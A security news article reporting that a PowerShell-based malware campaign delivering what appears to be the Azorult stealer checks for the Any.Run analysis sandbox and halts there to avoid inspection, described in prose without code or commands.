Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|
Advertisement

Ad Placeholder

Full Width × 90

Breaking News

Malware campaign attempts to evade analysis with Any.Run sandbox

Malware authors are implementing the capability to check if their malicious code is running in the Any.Run malware analysis service. Vxers are implementing the capability to check if their malware is running in the Any.Run interactive online malware sandbox to prevent them from being analyzed by experts. Every time malware is uploaded to the platform, […]

Any.Run

Malware authors are implementing the capability to check if their malicious code is running in the Any.Run malware analysis service.

Vxers are implementing the capability to check if their malware is running in the Any.Run interactive online malware sandbox to prevent them from being analyzed by experts.

Every time malware is uploaded to the platform, the service will create a Windows virtual machine with an interactive remote desktop, and execute the file within this environment.

Any.Run allows analysts to determine the malware behavior by recording any associated activity on files, registries, and network connections.

According to Bleeping Computer, a new malware campaign first spotted by the malware researcher JAMESWT employed a technique to detect the execution in an Any.Run VM.

JAMESWT uncovered a malware campaign using malicious PowerShell scripts that are used to download and installing malware onto the victims’ computers.

The threat actors behind the campaign execute a script to download two PowerShell scripts that contain obfuscated and embedded malware.

The script will decode the embedded malware and execute it on the target computer.

The second script is then executed and attempt to launch a version of the Azorult password-stealing Trojan, but if detects that the program is running on Any.Run it will display the message ‘Any.run Detected!’ and halt the execution. 

This will cause the malware to not be executed so that the sandbox cannot analyze it.

“When the second script is run, it will attempt to launch what appears to be the Azorult password-stealing Trojan. If it detects that the program is running on Any.Run, it will display the message ‘Any.run Deteceted!’ and exit. This will cause the malware to not be executed so that the sandbox cannot analyze it.” states BleepingComputer.

In this way, threat actors attempt to prevent that their malware is analyzed by the popular sandbox service.

Experts noticed that the Trojan is normally executed with installed on a live system or withing any other virtual machine.

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, Any.Run)

[adrotate banner=”5″]

[adrotate banner=”13″]